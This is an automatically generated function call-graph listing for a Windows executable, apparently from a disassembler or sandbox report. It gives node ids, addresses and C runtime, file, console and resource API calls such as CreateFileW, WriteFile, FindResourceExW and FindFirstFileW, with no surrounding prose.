fc8af4 __chsize_nolock 58 API calls 105513->105514 105516 fd8060 105514->105516 105523 fd80a0 105515->105523 105517 fc8b28 __cftof_l 58 API calls 105516->105517 105519 fd806a 105517->105519 105518 fd811e GetFileType 105520 fd8129 GetLastError 105518->105520 105521 fd816b 105518->105521 105525 fc8b28 __cftof_l 58 API calls 105519->105525 105526 fc8b07 __dosmaperr 58 API calls 105520->105526 105531 fcd52a __set_osfhnd 59 API calls 105521->105531 105522 fd80ec GetLastError 105524 fc8b07 __dosmaperr 58 API calls 105522->105524 105523->105518 105523->105522 105527 fd7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105523->105527 105528 fd8111 105524->105528 105525->105503 105529 fd8150 CloseHandle 105526->105529 105530 fd80e1 105527->105530 105533 fc8b28 __cftof_l 58 API calls 105528->105533 105529->105528 105532 fd815e 105529->105532 105530->105518 105530->105522 105536 fd8189 105531->105536 105534 fc8b28 __cftof_l 58 API calls 105532->105534 105533->105489 105535 fd8163 105534->105535 105535->105528 105537 fd820a 105536->105537 105538 fd8344 105536->105538 105539 fd18c1 __lseeki64_nolock 60 API calls 105536->105539 105537->105538 105553 fd18c1 60 API calls __lseeki64_nolock 105537->105553 105554 fcd886 __write 78 API calls 105537->105554 105559 fd8212 105537->105559 105538->105489 105540 fd8517 CloseHandle 105538->105540 105541 fd81f3 105539->105541 105542 fd7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105540->105542 105544 fc8af4 __chsize_nolock 58 API calls 105541->105544 105541->105559 105543 fd853e 105542->105543 105545 fd83ce 105543->105545 105546 fd8546 GetLastError 105543->105546 105544->105537 105545->105489 105547 fc8b07 __dosmaperr 58 API calls 105546->105547 105550 fd8552 105547->105550 105548 fd0e5b 70 API calls __read_nolock 105548->105559 105549 fd0add __close_nolock 61 API calls 105549->105559 105552 fcd43d __free_osfhnd 59 API calls 105550->105552 105551 fd97a2 __chsize_nolock 82 API calls 105551->105559 105552->105545 105553->105537 105554->105537 105555 fd83c1 105557 fd0add __close_nolock 61 API calls 105555->105557 105556 fd83aa 105556->105538 105558 fd83c8 105557->105558 105561 fc8b28 __cftof_l 58 API calls 105558->105561 105559->105537 105559->105548 105559->105549 105559->105551 105559->105555 105559->105556 105560 fd18c1 60 API calls __lseeki64_nolock 105559->105560 105560->105559 105561->105545 105562->105480 105563->105485 105564->105485 105566 fa4b83 105565->105566 105567 fa4c3f LoadLibraryA 105565->105567 105566->105364 105566->105366 105567->105566 105568 fa4c50 GetProcAddress 105567->105568 105568->105566 105570 fa4ea3 FindResourceExW 105569->105570 105574 fa4ec0 105569->105574 105571 fdd933 LoadResource 105570->105571 105570->105574 105572 fdd948 SizeofResource 105571->105572 105571->105574 105573 fdd95c LockResource 105572->105573 105572->105574 105573->105574 105574->105374 105576 fdd9ab 105575->105576 105577 fa4ef4 105575->105577 105581 fc584d 105577->105581 105579 fa4f02 105579->105385 105580->105374 105582 fc5859 __initptd 105581->105582 105583 fc586b 105582->105583 105585 fc5891 105582->105585 105594 fc8b28 58 API calls __getptd_noexit 105583->105594 105596 fc6c11 105585->105596 105586 fc5870 105595 fc8db6 9 API calls __cftof_l 105586->105595 105589 fc5897 105602 fc57be 83 API calls 4 library calls 105589->105602 105591 fc58a6 105603 fc58c8 LeaveCriticalSection LeaveCriticalSection __wfsopen 105591->105603 105593 fc587b __initptd 105593->105579 105594->105586 105595->105593 105597 fc6c21 105596->105597 105598 fc6c43 EnterCriticalSection 105596->105598 105597->105598 105599 fc6c29 105597->105599 105600 fc6c39 105598->105600 105601 fc9c0b __lock 58 API calls 105599->105601 105600->105589 105601->105600 105602->105591 105603->105593 105607 fc55fd 105604->105607 105606 fa4f2e 105606->105393 105608 fc5609 __initptd 105607->105608 105609 fc564c 105608->105609 105610 fc561f _memset 105608->105610 105611 fc5644 __initptd 105608->105611 105612 fc6c11 __lock_file 59 API calls 105609->105612 105620 fc8b28 58 API calls __getptd_noexit 105610->105620 105611->105606 105613 fc5652 105612->105613 105622 fc541d 72 API calls 6 library calls 105613->105622 105616 fc5639 105621 fc8db6 9 API calls __cftof_l 105616->105621 105617 fc5668 105623 fc5686 LeaveCriticalSection LeaveCriticalSection __wfsopen 105617->105623 105620->105616 105621->105611 105622->105617 105623->105611 105627 fc520a GetSystemTimeAsFileTime 105624->105627 105626 1008f6e 105626->105395 105628 fc5238 __aulldiv 105627->105628 105628->105626 105630 fc5c6c __initptd 105629->105630 105631 fc5c7e 105630->105631 105632 fc5c93 105630->105632 105643 fc8b28 58 API calls __getptd_noexit 105631->105643 105633 fc6c11 __lock_file 59 API calls 105632->105633 105636 fc5c99 105633->105636 105635 fc5c83 105644 fc8db6 9 API calls __cftof_l 105635->105644 105645 fc58d0 67 API calls 5 library calls 105636->105645 105639 fc5ca4 105646 fc5cc4 LeaveCriticalSection LeaveCriticalSection __wfsopen 105639->105646 105641 fc5cb6 105642 fc5c8e __initptd 105641->105642 105642->105400 105643->105635 105644->105642 105645->105639 105646->105641 105647->105281 105648->105295 105649->105298 105650->105294 105651->105302 105652->105303 105656 1009748 __tzset_nolock _wcscmp 105653->105656 105654 1009109 GetSystemTimeAsFileTime 105654->105656 105655 10095dc 105655->105313 105655->105341 105656->105654 105656->105655 105657 fa4f0b 74 API calls 105656->105657 105658 fa4ee5 85 API calls 105656->105658 105657->105656 105658->105656 105659->105340 105661 fc53b2 __initptd 105660->105661 105662 fc53de 105661->105662 105663 fc53c6 105661->105663 105665 fc6c11 __lock_file 59 API calls 105662->105665 105669 fc53d6 __initptd 105662->105669 105689 fc8b28 58 API calls __getptd_noexit 105663->105689 105667 fc53f0 105665->105667 105666 fc53cb 105690 fc8db6 9 API calls __cftof_l 105666->105690 105673 fc533a 105667->105673 105669->105346 105674 fc535d 105673->105674 105675 fc5349 105673->105675 105676 fc5359 105674->105676 105692 fc4a3d 105674->105692 105735 fc8b28 58 API calls __getptd_noexit 105675->105735 105691 fc5415 LeaveCriticalSection LeaveCriticalSection __wfsopen 105676->105691 105679 fc534e 105736 fc8db6 9 API calls __cftof_l 105679->105736 105685 fc5377 105709 fd0a02 105685->105709 105687 fc537d 105687->105676 105688 fc2d55 _free 58 API calls 105687->105688 105688->105676 105689->105666 105690->105669 105691->105669 105693 fc4a50 105692->105693 105697 fc4a74 105692->105697 105694 fc46e6 __ftell_nolock 58 API calls 105693->105694 105693->105697 105695 fc4a6d 105694->105695 105737 fcd886 105695->105737 105698 fd0b77 105697->105698 105699 fc5371 105698->105699 105700 fd0b84 105698->105700 105702 fc46e6 105699->105702 105700->105699 105701 fc2d55 _free 58 API calls 105700->105701 105701->105699 105703 fc4705 105702->105703 105704 fc46f0 105702->105704 105703->105685 105872 fc8b28 58 API calls __getptd_noexit 105704->105872 105706 fc46f5 105873 fc8db6 9 API calls __cftof_l 105706->105873 105708 fc4700 105708->105685 105710 fd0a0e __initptd 105709->105710 105711 fd0a1b 105710->105711 105712 fd0a32 105710->105712 105889 fc8af4 58 API calls __getptd_noexit 105711->105889 105713 fd0abd 105712->105713 105715 fd0a42 105712->105715 105894 fc8af4 58 API calls __getptd_noexit 105713->105894 105718 fd0a6a 105715->105718 105719 fd0a60 105715->105719 105717 fd0a20 105890 fc8b28 58 API calls __getptd_noexit 105717->105890 105723 fcd206 ___lock_fhandle 59 API calls 105718->105723 105891 fc8af4 58 API calls __getptd_noexit 105719->105891 105722 fd0a65 105895 fc8b28 58 API calls __getptd_noexit 105722->105895 105725 fd0a70 105723->105725 105727 fd0a8e 105725->105727 105728 fd0a83 105725->105728 105726 fd0ac9 105896 fc8db6 9 API calls __cftof_l 105726->105896 105892 fc8b28 58 API calls __getptd_noexit 105727->105892 105874 fd0add 105728->105874 105731 fd0a27 __initptd 105731->105687 105733 fd0a89 105893 fd0ab5 LeaveCriticalSection __unlock_fhandle 105733->105893 105735->105679 105736->105676 105738 fcd892 __initptd 105737->105738 105739 fcd89f 105738->105739 105740 fcd8b6 105738->105740 105838 fc8af4 58 API calls __getptd_noexit 105739->105838 105742 fcd955 105740->105742 105744 fcd8ca 105740->105744 105844 fc8af4 58 API calls __getptd_noexit 105742->105844 105743 fcd8a4 105839 fc8b28 58 API calls __getptd_noexit 105743->105839 105747 fcd8e8 105744->105747 105748 fcd8f2 105744->105748 105840 fc8af4 58 API calls __getptd_noexit 105747->105840 105765 fcd206 105748->105765 105751 fcd8ed 105845 fc8b28 58 API calls __getptd_noexit 105751->105845 105752 fcd8f8 105755 fcd91e 105752->105755 105756 fcd90b 105752->105756 105754 fcd8ab __initptd 105754->105697 105841 fc8b28 58 API calls __getptd_noexit 105755->105841 105774 fcd975 105756->105774 105757 fcd961 105846 fc8db6 9 API calls __cftof_l 105757->105846 105761 fcd917 105843 fcd94d LeaveCriticalSection __unlock_fhandle 105761->105843 105762 fcd923 105842 fc8af4 58 API calls __getptd_noexit 105762->105842 105766 fcd212 __initptd 105765->105766 105767 fcd261 EnterCriticalSection 105766->105767 105768 fc9c0b __lock 58 API calls 105766->105768 105769 fcd287 __initptd 105767->105769 105770 fcd237 105768->105770 105769->105752 105771 fcd24f 105770->105771 105847 fc9e2b InitializeCriticalSectionAndSpinCount 105770->105847 105848 fcd28b LeaveCriticalSection _doexit 105771->105848 105775 fcd982 __ftell_nolock 105774->105775 105776 fcd9e0 105775->105776 105777 fcd9c1 105775->105777 105824 fcd9b6 105775->105824 105782 fcda38 105776->105782 105783 fcda1c 105776->105783 105858 fc8af4 58 API calls __getptd_noexit 105777->105858 105778 fcc5f6 ___crtMessageBoxW 6 API calls 105780 fce1d6 105778->105780 105780->105761 105781 fcd9c6 105859 fc8b28 58 API calls __getptd_noexit 105781->105859 105786 fcda51 105782->105786 105864 fd18c1 60 API calls 3 library calls 105782->105864 105861 fc8af4 58 API calls __getptd_noexit 105783->105861 105849 fd5c6b 105786->105849 105787 fcda21 105862 fc8b28 58 API calls __getptd_noexit 105787->105862 105788 fcd9cd 105860 fc8db6 9 API calls __cftof_l 105788->105860 105793 fcda5f 105795 fcddb8 105793->105795 105865 fc99ac 58 API calls 2 library calls 105793->105865 105794 fcda28 105863 fc8db6 9 API calls __cftof_l 105794->105863 105796 fce14b WriteFile 105795->105796 105797 fcddd6 105795->105797 105800 fcddab GetLastError 105796->105800 105804 fcdd78 105796->105804 105801 fcddec 105797->105801 105802 fcdefa 105797->105802 105800->105804 105807 fcde5b WriteFile 105801->105807 105812 fce184 105801->105812 105821 fcdfef 105802->105821 105822 fcdf05 105802->105822 105803 fcda8b GetConsoleMode 105803->105795 105806 fcdaca 105803->105806 105811 fcded8 105804->105811 105804->105812 105804->105824 105805 fcdada GetConsoleCP 105805->105812 105833 fcdb09 105805->105833 105806->105795 105806->105805 105807->105800 105809 fcde98 105807->105809 105809->105801 105816 fcdebc 105809->105816 105810 fce1b2 105871 fc8af4 58 API calls __getptd_noexit 105810->105871 105813 fce17b 105811->105813 105814 fcdee3 105811->105814 105812->105824 105870 fc8b28 58 API calls __getptd_noexit 105812->105870 105869 fc8b07 58 API calls 3 library calls 105813->105869 105867 fc8b28 58 API calls __getptd_noexit 105814->105867 105815 fce064 WideCharToMultiByte 105815->105800 105831 fce0ab 105815->105831 105816->105804 105817 fcdf6a WriteFile 105817->105800 105823 fcdfb9 105817->105823 105821->105812 105821->105815 105822->105812 105822->105817 105823->105804 105823->105816 105823->105822 105824->105778 105825 fcdee8 105868 fc8af4 58 API calls __getptd_noexit 105825->105868 105826 fce0b3 WriteFile 105829 fce106 GetLastError 105826->105829 105826->105831 105829->105831 105830 fd62ba 60 API calls __write_nolock 105830->105833 105831->105804 105831->105816 105831->105821 105831->105826 105832 fd7a5e WriteConsoleW CreateFileW __putwch_nolock 105836 fcdc5f 105832->105836 105833->105804 105833->105830 105834 fcdbf2 WideCharToMultiByte 105833->105834 105833->105836 105866 fc35f5 58 API calls __isleadbyte_l 105833->105866 105834->105804 105835 fcdc2d WriteFile 105834->105835 105835->105800 105835->105836 105836->105800 105836->105804 105836->105832 105836->105833 105837 fcdc87 WriteFile 105836->105837 105837->105800 105837->105836 105838->105743 105839->105754 105840->105751 105841->105762 105842->105761 105843->105754 105844->105751 105845->105757 105846->105754 105847->105771 105848->105767 105850 fd5c76 105849->105850 105851 fd5c83 105849->105851 105852 fc8b28 __cftof_l 58 API calls 105850->105852 105854 fd5c8f 105851->105854 105855 fc8b28 __cftof_l 58 API calls 105851->105855 105853 fd5c7b 105852->105853 105853->105793 105854->105793 105856 fd5cb0 105855->105856 105857 fc8db6 __cftof_l 9 API calls 105856->105857 105857->105853 105858->105781 105859->105788 105860->105824 105861->105787 105862->105794 105863->105824 105864->105786 105865->105803 105866->105833 105867->105825 105868->105824 105869->105824 105870->105810 105871->105824 105872->105706 105873->105708 105897 fcd4c3 105874->105897 105876 fd0b41 105910 fcd43d 59 API calls 2 library calls 105876->105910 105878 fd0aeb 105878->105876 105879 fd0b1f 105878->105879 105881 fcd4c3 __chsize_nolock 58 API calls 105878->105881 105879->105876 105882 fcd4c3 __chsize_nolock 58 API calls 105879->105882 105880 fd0b49 105883 fd0b6b 105880->105883 105911 fc8b07 58 API calls 3 library calls 105880->105911 105884 fd0b16 105881->105884 105885 fd0b2b CloseHandle 105882->105885 105883->105733 105888 fcd4c3 __chsize_nolock 58 API calls 105884->105888 105885->105876 105886 fd0b37 GetLastError 105885->105886 105886->105876 105888->105879 105889->105717 105890->105731 105891->105722 105892->105733 105893->105731 105894->105722 105895->105726 105896->105731 105898 fcd4ce 105897->105898 105900 fcd4e3 105897->105900 105912 fc8af4 58 API calls __getptd_noexit 105898->105912 105904 fcd508 105900->105904 105914 fc8af4 58 API calls __getptd_noexit 105900->105914 105901 fcd4d3 105913 fc8b28 58 API calls __getptd_noexit 105901->105913 105904->105878 105905 fcd512 105915 fc8b28 58 API calls __getptd_noexit 105905->105915 105906 fcd4db 105906->105878 105908 fcd51a 105916 fc8db6 9 API calls __cftof_l 105908->105916 105910->105880 105911->105883 105912->105901 105913->105906 105914->105905 105915->105908 105916->105906 105918 fc079e __ftell_nolock 105917->105918 105919 fc079f GetLongPathNameW 105918->105919 105920 fa7bcc 59 API calls 105919->105920 105921 fa72bd 105920->105921 105922 fa700b 105921->105922 105923 fa7667 59 API calls 105922->105923 105924 fa701d 105923->105924 105925 fa4750 60 API calls 105924->105925 105926 fa7028 105925->105926 105927 fde885 105926->105927 105928 fa7033 105926->105928 105932 fde89f 105927->105932 105975 fa7908 61 API calls 105927->105975 105929 fa3f74 59 API calls 105928->105929 105931 fa703f 105929->105931 105969 fa34c2 105931->105969 105934 fa7052 Mailbox 105934->105131 105936 fa4ddd 136 API calls 105935->105936 105937 fa688f 105936->105937 105938 fde031 105937->105938 105940 fa4ddd 136 API calls 105937->105940 105939 100955b 122 API calls 105938->105939 105941 fde046 105939->105941 105942 fa68a3 105940->105942 105944 fde04a 105941->105944 105945 fde067 105941->105945 105942->105938 105943 fa68ab 105942->105943 105946 fa68b7 105943->105946 105947 fde052 105943->105947 105948 fa4e4a 84 API calls 105944->105948 105949 fc0db6 Mailbox 59 API calls 105945->105949 105976 fa6a8c 105946->105976 106068 10042f8 90 API calls _wprintf 105947->106068 105948->105947 105958 fde0ac Mailbox 105949->105958 105953 fde060 105953->105945 105954 fde260 105955 fc2d55 _free 58 API calls 105954->105955 105956 fde268 105955->105956 105957 fa4e4a 84 API calls 105956->105957 105959 fde271 105957->105959 105958->105954 105958->105959 105966 fa7de1 59 API calls 105958->105966 106069 fff73d 59 API calls 2 library calls 105958->106069 106070 fff65e 61 API calls 2 library calls 105958->106070 106071 100737f 59 API calls Mailbox 105958->106071 106072 fa750f 59 API calls 2 library calls 105958->106072 106073 fa735d 59 API calls Mailbox 105958->106073 105963 fc2d55 _free 58 API calls 105959->105963 105964 fa4e4a 84 API calls 105959->105964 106074 fff7a1 89 API calls 4 library calls 105959->106074 105963->105959 105964->105959 105966->105958 105970 fa34d4 105969->105970 105974 fa34f3 _memmove 105969->105974 105972 fc0db6 Mailbox 59 API calls 105970->105972 105971 fc0db6 Mailbox 59 API calls 105973 fa350a 105971->105973 105972->105974 105973->105934 105974->105971 105975->105927 105977 fde41e 105976->105977 105978 fa6ab5 105976->105978 106147 fff7a1 89 API calls 4 library calls 105977->106147 106080 fa57a6 60 API calls Mailbox 105978->106080 105981 fa6ad7 106081 fa57f6 67 API calls 105981->106081 105982 fde431 106148 fff7a1 89 API calls 4 library calls 105982->106148 105984 fa6aec 105984->105982 105986 fa6af4 105984->105986 105988 fa7667 59 API calls 105986->105988 105987 fde44d 105990 fa6b61 105987->105990 105989 fa6b00 105988->105989 106082 fc0957 60 API calls __ftell_nolock 105989->106082 105992 fa6b6f 105990->105992 105993 fde460 105990->105993 105996 fa7667 59 API calls 105992->105996 105995 fa5c6f CloseHandle 105993->105995 105994 fa6b0c 105997 fa7667 59 API calls 105994->105997 105999 fde46c 105995->105999 106000 fa6b78 105996->106000 105998 fa6b18 105997->105998 106001 fa4750 60 API calls 105998->106001 106002 fa4ddd 136 API calls 105999->106002 106003 fa7667 59 API calls 106000->106003 106004 fa6b26 106001->106004 106005 fde488 106002->106005 106006 fa6b81 106003->106006 106083 fa5850 ReadFile SetFilePointerEx 106004->106083 106008 fde4b1 106005->106008 106011 100955b 122 API calls 106005->106011 106085 fa459b 106006->106085 106149 fff7a1 89 API calls 4 library calls 106008->106149 106010 fa6b52 106084 fa5aee SetFilePointerEx SetFilePointerEx 106010->106084 106015 fde4a4 106011->106015 106012 fa6b98 106016 fa7b2e 59 API calls 106012->106016 106017 fde4cd 106015->106017 106018 fde4ac 106015->106018 106019 fa6ba9 SetCurrentDirectoryW 106016->106019 106020 fa4e4a 84 API calls 106017->106020 106021 fa4e4a 84 API calls 106018->106021 106022 fa6bbc Mailbox 106019->106022 106023 fde4d2 106020->106023 106021->106008 106026 fc0db6 Mailbox 59 API calls 106022->106026 106024 fc0db6 Mailbox 59 API calls 106023->106024 106030 fde506 106024->106030 106028 fa6bcf 106026->106028 106027 fa3bbb 106027->104990 106027->104999 106029 fa522e 59 API calls 106028->106029 106057 fa6bda Mailbox __NMSG_WRITE 106029->106057 106150 fa750f 59 API calls 2 library calls 106030->106150 106032 fa6ce7 106143 fa5c6f 106032->106143 106035 fde740 106156 10072df 59 API calls Mailbox 106035->106156 106036 fa6cf3 SetCurrentDirectoryW 106049 fa6d0c Mailbox 106036->106049 106039 fde762 106157 101fbce 59 API calls 2 library calls 106039->106157 106042 fde76f 106044 fc2d55 _free 58 API calls 106042->106044 106043 fde7d9 106160 fff7a1 89 API calls 4 library calls 106043->106160 106044->106049 106048 fde7f2 106048->106032 106075 fa57d4 106049->106075 106051 fde7d1 106159 fff5f7 59 API calls 4 library calls 106051->106159 106054 fa7de1 59 API calls 106054->106057 106057->106032 106057->106043 106057->106051 106057->106054 106136 fa586d 67 API calls _wcscpy 106057->106136 106137 fa6f5d GetStringTypeW 106057->106137 106138 fa6ecc 60 API calls __wcsnicmp 106057->106138 106139 fa6faa GetStringTypeW __NMSG_WRITE 106057->106139 106140 fc363d GetStringTypeW _iswctype 106057->106140 106141 fa68dc 165 API calls 3 library calls 106057->106141 106142 fa7213 59 API calls Mailbox 106057->106142 106058 fa7de1 59 API calls 106065 fde54f Mailbox 106058->106065 106062 fde792 106158 fff7a1 89 API calls 4 library calls 106062->106158 106064 fde7ab 106066 fc2d55 _free 58 API calls 106064->106066 106065->106035 106065->106058 106065->106062 106151 fff73d 59 API calls 2 library calls 106065->106151 106152 fff65e 61 API calls 2 library calls 106065->106152 106153 100737f 59 API calls Mailbox 106065->106153 106154 fa750f 59 API calls 2 library calls 106065->106154 106155 fa7213 59 API calls Mailbox 106065->106155 106067 fde4c8 106066->106067 106067->106049 106068->105953 106069->105958 106070->105958 106071->105958 106072->105958 106073->105958 106074->105959 106076 fa5c6f CloseHandle 106075->106076 106077 fa57dc Mailbox 106076->106077 106078 fa5c6f CloseHandle 106077->106078 106079 fa57eb 106078->106079 106079->106027 106080->105981 106081->105984 106082->105994 106083->106010 106084->105990 106086 fa7667 59 API calls 106085->106086 106087 fa45b1 106086->106087 106088 fa7667 59 API calls 106087->106088 106089 fa45b9 106088->106089 106090 fa7667 59 API calls 106089->106090 106091 fa45c1 106090->106091 106092 fa7667 59 API calls 106091->106092 106093 fa45c9 106092->106093 106094 fa45fd 106093->106094 106095 fdd4d2 106093->106095 106096 fa784b 59 API calls 106094->106096 106097 fa8047 59 API calls 106095->106097 106098 fa460b 106096->106098 106099 fdd4db 106097->106099 106100 fa7d2c 59 API calls 106098->106100 106101 fa7d8c 59 API calls 106099->106101 106102 fa4615 106100->106102 106104 fa4640 106101->106104 106103 fa784b 59 API calls 106102->106103 106102->106104 106107 fa4636 106103->106107 106105 fa4680 106104->106105 106108 fa465f 106104->106108 106118 fdd4fb 106104->106118 106106 fa784b 59 API calls 106105->106106 106109 fa4691 106106->106109 106110 fa7d2c 59 API calls 106107->106110 106112 fa79f2 59 API calls 106108->106112 106113 fa46a3 106109->106113 106116 fa8047 59 API calls 106109->106116 106110->106104 106111 fdd5cb 106114 fa7bcc 59 API calls 106111->106114 106115 fa4669 106112->106115 106117 fa46b3 106113->106117 106120 fa8047 59 API calls 106113->106120 106125 fdd588 106114->106125 106115->106105 106119 fa784b 59 API calls 106115->106119 106116->106113 106122 fa46ba 106117->106122 106123 fa8047 59 API calls 106117->106123 106118->106111 106121 fdd5b4 106118->106121 106133 fdd532 106118->106133 106119->106105 106120->106117 106121->106111 106128 fdd59f 106121->106128 106124 fa8047 59 API calls 106122->106124 106126 fa46c1 Mailbox 106122->106126 106123->106122 106124->106126 106125->106105 106127 fa79f2 59 API calls 106125->106127 106161 fa7924 59 API calls 2 library calls 106125->106161 106126->106012 106127->106125 106130 fa7bcc 59 API calls 106128->106130 106129 fdd590 106131 fa7bcc 59 API calls 106129->106131 106130->106125 106131->106125 106133->106129 106134 fdd57b 106133->106134 106135 fa7bcc 59 API calls 106134->106135 106135->106125 106136->106057 106137->106057 106138->106057 106139->106057 106140->106057 106141->106057 106142->106057 106144 fa5c88 106143->106144 106145 fa5c79 106143->106145 106144->106145 106146 fa5c8d CloseHandle 106144->106146 106145->106036 106146->106145 106147->105982 106148->105987 106149->106067 106150->106065 106151->106065 106152->106065 106153->106065 106154->106065 106155->106065 106156->106039 106157->106042 106158->106064 106159->106043 106160->106048 106161->106125 106163 fa6d95 106162->106163 106167 fa6ea9 106162->106167 106164 fc0db6 Mailbox 59 API calls 106163->106164 106163->106167 106166 fa6dbc 106164->106166 106165 fc0db6 Mailbox 59 API calls 106172 fa6e31 106165->106172 106166->106165 106167->105138 106172->106167 106175 fa6240 106172->106175 106200 fa735d 59 API calls Mailbox 106172->106200 106201 ff6553 59 API calls Mailbox 106172->106201 106202 fa750f 59 API calls 2 library calls 106172->106202 106173->105140 106174->105142 106176 fa7a16 59 API calls 106175->106176 106196 fa6265 106176->106196 106177 fa646a 106205 fa750f 59 API calls 2 library calls 106177->106205 106179 fa6484 Mailbox 106179->106172 106182 fddff6 106208 fff8aa 91 API calls 4 library calls 106182->106208 106183 fa750f 59 API calls 106183->106196 106185 fa6799 _memmove 106210 fff8aa 91 API calls 4 library calls 106185->106210 106188 fa7d8c 59 API calls 106188->106196 106189 fde004 106209 fa750f 59 API calls 2 library calls 106189->106209 106191 fde01a 106191->106179 106192 fddf92 106193 fa8029 59 API calls 106192->106193 106195 fddf9d 106193->106195 106199 fc0db6 Mailbox 59 API calls 106195->106199 106196->106177 106196->106182 106196->106183 106196->106185 106196->106188 106196->106192 106197 fa7e4f 59 API calls 106196->106197 106203 fa5f6c 60 API calls 106196->106203 106204 fa5d41 59 API calls Mailbox 106196->106204 106206 fa5e72 60 API calls 106196->106206 106207 fa7924 59 API calls 2 library calls 106196->106207 106198 fa643b CharUpperBuffW 106197->106198 106198->106196 106199->106185 106200->106172 106201->106172 106202->106172 106203->106196 106204->106196 106205->106179 106206->106196 106207->106196 106208->106189 106209->106191 106210->106179 106211->105155 106212->105156 106214 fae6d5 106213->106214 106215 fe3aa9 106214->106215 106217 fae73f 106214->106217 106227 fae799 106214->106227 106216 fa9ea0 331 API calls 106215->106216 106218 fe3abe 106216->106218 106221 fa7667 59 API calls 106217->106221 106217->106227 106229 fae970 Mailbox 106218->106229 106286 1009e4a 89 API calls 4 library calls 106218->106286 106219 fa7667 59 API calls 106219->106227 106223 fe3b04 106221->106223 106222 fc2d40 __cinit 67 API calls 106222->106227 106225 fc2d40 __cinit 67 API calls 106223->106225 106224 fe3b26 106224->105223 106225->106227 106226 fa84c0 69 API calls 106226->106229 106227->106219 106227->106222 106227->106224 106228 fae95a 106227->106228 106227->106229 106228->106229 106287 1009e4a 89 API calls 4 library calls 106228->106287 106229->106226 106231 fa9ea0 331 API calls 106229->106231 106235 faf195 106229->106235 106236 fa8d40 59 API calls 106229->106236 106238 1009e4a 89 API calls 106229->106238 106243 faea78 106229->106243 106285 fa7f77 59 API calls 2 library calls 106229->106285 106288 ff6e8f 59 API calls 106229->106288 106289 101c5c3 331 API calls 106229->106289 106290 101b53c 331 API calls Mailbox 106229->106290 106292 fa9c90 59 API calls Mailbox 106229->106292 106293 10193c6 331 API calls Mailbox 106229->106293 106231->106229 106291 1009e4a 89 API calls 4 library calls 106235->106291 106236->106229 106238->106229 106242 fe3e25 106242->105223 106243->105223 106245 faf4ba 106244->106245 106246 faf650 106244->106246 106247 fe441e 106245->106247 106248 faf4c6 106245->106248 106249 fa7de1 59 API calls 106246->106249 106388 101bc6b 331 API calls Mailbox 106247->106388 106386 faf290 331 API calls 2 library calls 106248->106386 106255 faf58c Mailbox 106249->106255 106252 fe442c 106256 faf630 106252->106256 106389 1009e4a 89 API calls 4 library calls 106252->106389 106254 faf4fd 106254->106252 106254->106255 106254->106256 106259 fa4e4a 84 API calls 106255->106259 106294 1003c37 106255->106294 106297 101445a 106255->106297 106306 100cb7a 106255->106306 106256->105223 106258 faf5e3 106258->106256 106387 fa9c90 59 API calls Mailbox 106258->106387 106259->106258 106263->105223 106264->105223 106265->105223 106266->105163 106267->105169 106268->105223 106269->105171 106270->105171 106271->105171 106272->105223 106273->105223 106274->105223 106275->105223 106276->105223 106277->105223 106278->105219 106279->105219 106280->105219 106281->105219 106282->105219 106283->105219 106284->105219 106285->106229 106286->106229 106287->106229 106288->106229 106289->106229 106290->106229 106291->106242 106292->106229 106293->106229 106390 100445a GetFileAttributesW 106294->106390 106298 fa9837 84 API calls 106297->106298 106299 1014494 106298->106299 106300 fa6240 94 API calls 106299->106300 106302 10144a4 106300->106302 106301 10144c9 106305 10144cd 106301->106305 106394 fa9a98 59 API calls Mailbox 106301->106394 106302->106301 106303 fa9ea0 331 API calls 106302->106303 106303->106301 106305->106258 106307 fa7667 59 API calls 106306->106307 106308 100cbaf 106307->106308 106309 fa7667 59 API calls 106308->106309 106310 100cbb8 106309->106310 106311 100cbcc 106310->106311 106504 fa9b3c 59 API calls 106310->106504 106313 fa9837 84 API calls 106311->106313 106314 100cbe9 106313->106314 106315 100ccea 106314->106315 106316 100cc0b 106314->106316 106327 100cd1a Mailbox 106314->106327 106318 fa4ddd 136 API calls 106315->106318 106317 fa9837 84 API calls 106316->106317 106319 100cc17 106317->106319 106320 100ccfe 106318->106320 106321 fa8047 59 API calls 106319->106321 106322 100cd16 106320->106322 106325 fa4ddd 136 API calls 106320->106325 106324 100cc23 106321->106324 106323 fa7667 59 API calls 106322->106323 106322->106327 106326 100cd4b 106323->106326 106329 100cc37 106324->106329 106330 100cc69 106324->106330 106325->106322 106328 fa7667 59 API calls 106326->106328 106327->106258 106331 100cd54 106328->106331 106332 fa8047 59 API calls 106329->106332 106333 fa9837 84 API calls 106330->106333 106334 fa7667 59 API calls 106331->106334 106335 100cc47 106332->106335 106336 100cc76 106333->106336 106337 100cd5d 106334->106337 106338 fa7cab 59 API calls 106335->106338 106339 fa8047 59 API calls 106336->106339 106340 fa7667 59 API calls 106337->106340 106341 100cc51 106338->106341 106342 100cc82 106339->106342 106343 100cd66 106340->106343 106344 fa9837 84 API calls 106341->106344 106505 1004a31 GetFileAttributesW 106342->106505 106346 fa9837 84 API calls 106343->106346 106348 100cc5d 106344->106348 106347 100cd73 106346->106347 106350 fa459b 59 API calls 106347->106350 106351 fa7b2e 59 API calls 106348->106351 106349 100cc8b 106352 100cc9e 106349->106352 106353 fa79f2 59 API calls 106349->106353 106354 100cd8e 106350->106354 106351->106330 106355 fa9837 84 API calls 106352->106355 106361 100cca4 106352->106361 106353->106352 106356 fa79f2 59 API calls 106354->106356 106357 100cccb 106355->106357 106358 100cd9d 106356->106358 106506 10037ef 75 API calls Mailbox 106357->106506 106360 100cdd1 106358->106360 106362 fa79f2 59 API calls 106358->106362 106363 fa8047 59 API calls 106360->106363 106361->106327 106364 100cdae 106362->106364 106365 100cddf 106363->106365 106364->106360 106368 fa7bcc 59 API calls 106364->106368 106366 fa7b2e 59 API calls 106365->106366 106367 100cded 106366->106367 106369 fa7b2e 59 API calls 106367->106369 106370 100cdc3 106368->106370 106371 100cdfb 106369->106371 106372 fa7bcc 59 API calls 106370->106372 106373 fa7b2e 59 API calls 106371->106373 106372->106360 106374 100ce09 106373->106374 106375 fa9837 84 API calls 106374->106375 106376 100ce15 106375->106376 106395 1004071 106376->106395 106378 100ce26 106379 1003c37 3 API calls 106378->106379 106380 100ce30 106379->106380 106381 fa9837 84 API calls 106380->106381 106384 100ce61 106380->106384 106382 100ce4e 106381->106382 106449 1009155 106382->106449 106385 fa4e4a 84 API calls 106384->106385 106385->106327 106386->106254 106387->106258 106388->106252 106389->106256 106391 1003c3e 106390->106391 106392 1004475 FindFirstFileW 106390->106392 106391->106258 106392->106391 106393 100448a FindClose 106392->106393 106393->106391 